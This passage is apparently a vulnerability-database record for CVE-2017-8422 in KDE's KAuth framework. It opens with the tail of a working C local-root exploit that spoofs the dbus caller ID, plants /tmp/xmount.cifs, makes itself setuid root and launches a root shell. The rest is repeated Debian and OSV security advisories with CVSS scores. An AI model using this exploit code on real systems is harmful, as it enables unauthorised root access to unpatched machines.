0x6d,0x00,0x62,0x00,0x34,0x00,\"\r\n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\"\r\n\"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\"\r\n\"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\"\r\n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\"\r\n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\"\r\n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\"\r\n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\",\r\n \r\n// the callerID, \":1.0\" which is dbus itself and thus always passes\r\n\"array:byte:58,49,46,48\", NULL};\r\n \r\n char *boomsh = \"/tmp/xmount.cifs\";\r\n char *const sh[] = {me, \"shell\", NULL};\r\n char *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL};\r\n struct stat st;\r\n int fd = -1;\r\n \r\n if (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0)\r\n die(\"[-] readlink\");\r\n \r\n if (geteuid() == 0) {\r\n setuid(0);\r\n setgid(0);\r\n if (argc == 2) {\r\n execve(*bash, bash, NULL);\r\n die(\"[-] execve of bash\");\r\n }\r\n chown(me, 0, 0);\r\n chmod(me, 04755);\r\n exit(0);\r\n }\r\n \r\n printf(\"[*] Creating shellscript ...\\n\");\r\n unlink(boomsh);\r\n if ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0)\r\n die(\"[-] open\");\r\n write(fd, \"#!/bin/sh\\n\", 10);\r\n write(fd, me, strlen(me));\r\n write(fd, \"\\n\", 1);\r\n close(fd);\r\n \r\n printf(\"[*] Triggering call...\\n\");\r\n \r\n if (fork() == 0) {\r\n execve(*dbus, dbus, NULL);\r\n exit(1);\r\n }\r\n wait(NULL);\r\n sleep(5);\r\n printf(\"[*] Trying to find rootshell...\\n\");\r\n \r\n memset(&st, 0, sizeof(st));\r\n stat(me, &st);\r\n if ((st.st_mode & 04000) != 04000)\r\n die(\"[-] Failed to chmod ourselfs.\\n\");\r\n \r\n execve(me, sh, NULL);\r\n return 0;\r\n}\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27821", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2021-10-21T22:03:14", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3849-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 12, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : kde4libs\nCVE ID : CVE-2017-6410 CVE-2017-8422\nDebian Bug : 856890\n\nSeveral vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\n\n Itzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\n reported that URLs are not sanitized before passing them to\n FindProxyForURL, potentially allowing a remote attacker to obtain\n sensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\n Sebastian Krahmer from SUSE discovered that the KAuth framework\n contains a logic flaw in which the service invoking dbus is not\n properly checked. This flaw allows spoofing the identity of the\n caller and gaining root privileges from an unprivileged account.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 4:4.14.2-5+deb8u2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.14.26-2.\n\nWe recommend that you upgrade your kde4libs packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-12T08:44:26", "type": "debian", "title": "[SECURITY] [DSA 3849-1] kde4libs security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6410", "CVE-2017-8422"], "modified": "2017-05-12T08:44:26", "id": "DEBIAN:DSA-3849-1:6F716", "href": "https://lists.debian.org/debian-security-announce/2017/msg00108.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T12:26:13", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3849-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 12, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : kde4libs\nCVE ID : CVE-2017-6410 CVE-2017-8422\nDebian Bug : 856890\n\nSeveral vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\n\n Itzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\n reported that URLs are not sanitized before passing them to\n FindProxyForURL, potentially allowing a remote attacker to obtain\n sensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\n Sebastian Krahmer from SUSE discovered that the KAuth framework\n contains a logic flaw in which the service invoking dbus is not\n properly checked. This flaw allows spoofing the identity of the\n caller and gaining root privileges from an unprivileged account.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 4:4.14.2-5+deb8u2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.14.26-2.\n\nWe recommend that you upgrade your kde4libs packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-12T08:44:26", "type": "debian", "title": "[SECURITY] [DSA 3849-1] kde4libs security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6410", "CVE-2017-8422"], "modified": "2017-05-12T08:44:26", "id": "DEBIAN:DSA-3849-1:B80A5", "href": "https://lists.debian.org/debian-security-announce/2017/msg00108.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T13:37:32", "description": "Package : kde4libs\nVersion : 4:4.8.4-4+deb7u3\nCVE ID : CVE-2013-2074 CVE-2017-6410 CVE-2017-8422\nDebian Bug : 856890\n\nSeveral vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\n\n Itzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\n reported that URLs are not sanitized before passing them to\n FindProxyForURL, potentially allowing a remote attacker to obtain\n sensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\n Sebastian Krahmer from SUSE discovered that the KAuth framework\n contains a logic flaw in which the service invoking dbus is not\n properly checked. This flaw allows spoofing the identity of the\n caller and gaining root privileges from an unprivileged account.\n\nCVE-2013-2074\n\n It was discovered that KIO would show web authentication\n credentials in some error cases.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4:4.8.4-4+deb7u3.\n\nWe recommend that you upgrade your kde4libs packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-25T16:25:15", "type": "debian", "title": "[SECURITY] [DLA 952-1] kde4libs security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2074", "CVE-2017-6410", "CVE-2017-8422"], "modified": "2017-05-25T16:25:15", "id": "DEBIAN:DLA-952-1:3CFB8", "href": "https://lists.debian.org/debian-lts-announce/2017/05/msg00023.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T16:14:33", "description": "Package : kde4libs\nVersion : 4:4.8.4-4+deb7u3\nCVE ID : CVE-2013-2074 CVE-2017-6410 CVE-2017-8422\nDebian Bug : 856890\n\nSeveral vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\n\n Itzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\n reported that URLs are not sanitized before passing them to\n FindProxyForURL, potentially allowing a remote attacker to obtain\n sensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\n Sebastian Krahmer from SUSE discovered that the KAuth framework\n contains a logic flaw in which the service invoking dbus is not\n properly checked. This flaw allows spoofing the identity of the\n caller and gaining root privileges from an unprivileged account.\n\nCVE-2013-2074\n\n It was discovered that KIO would show web authentication\n credentials in some error cases.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4:4.8.4-4+deb7u3.\n\nWe recommend that you upgrade your kde4libs packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-25T16:25:15", "type": "debian", "title": "[SECURITY] [DLA 952-1] kde4libs security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2074", "CVE-2017-6410", "CVE-2017-8422"], "modified": "2017-05-25T16:25:15", "id": "DEBIAN:DLA-952-1:E72E9", "href": "https://lists.debian.org/debian-lts-announce/2017/05/msg00023.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-06T05:05:27", "description": "\nSeveral vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\n\n* [CVE-2017-6410](https://security-tracker.debian.org/tracker/CVE-2017-6410)\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\n reported that URLs are not sanitized before passing them to\n FindProxyForURL, potentially allowing a remote attacker to obtain\n sensitive information via a crafted PAC file.\n* [CVE-2017-8422](https://security-tracker.debian.org/tracker/CVE-2017-8422)\nSebastian Krahmer from SUSE discovered that the KAuth framework\n contains a logic flaw in which the service invoking dbus is not\n properly checked. This flaw allows spoofing the identity of the\n caller and gaining root privileges from an unprivileged account.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 4:4.14.2-5+deb8u2.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.14.26-2.\n\n\nWe recommend that you upgrade your kde4libs packages.\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "osv", "title": "kde4libs - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6410", "CVE-2017-8422"], "modified": "2022-07-06T02:46:40", "id": "OSV:DSA-3849-1", "href": "https://osv.dev/vulnerability/DSA-3849-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T05:13:00", "description": "\nSeveral vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\n\n* [CVE-2017-6410](https://security-tracker.debian.org/tracker/CVE-2017-6410)\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\n reported that URLs are not sanitized before passing them to\n FindProxyForURL, potentially allowing a remote attacker to obtain\n sensitive information via a crafted PAC file.\n* [CVE-2017-8422](https://security-tracker.debian.org/tracker/CVE-2017-8422)\nSebastian Krahmer from SUSE discovered that the KAuth framework\n contains a logic flaw in which the service invoking dbus is not\n properly checked. This flaw allows spoofing the identity of the\n caller and gaining root privileges from an unprivileged account.\n* [CVE-2013-2074](https://security-tracker.debian.org/tracker/CVE-2013-2074)\nIt was discovered that KIO would show web authentication\n credentials in some error cases.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n4:4.8.4-4+deb7u3.\n\n\nWe recommend that you upgrade your kde4libs packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-25T00:00:00", "type": "osv", "title": "kde4libs - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2074", "CVE-2017-6410", "CVE-2017-8422"], "modified": "2022-07-06T01:50:53", "id": "OSV:DLA-952-1", "href": "https://osv.dev/vulnerability/DLA-952-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
[SECURITY] Fedora 26 Update: kdelibs-4.14.30-2.fc26
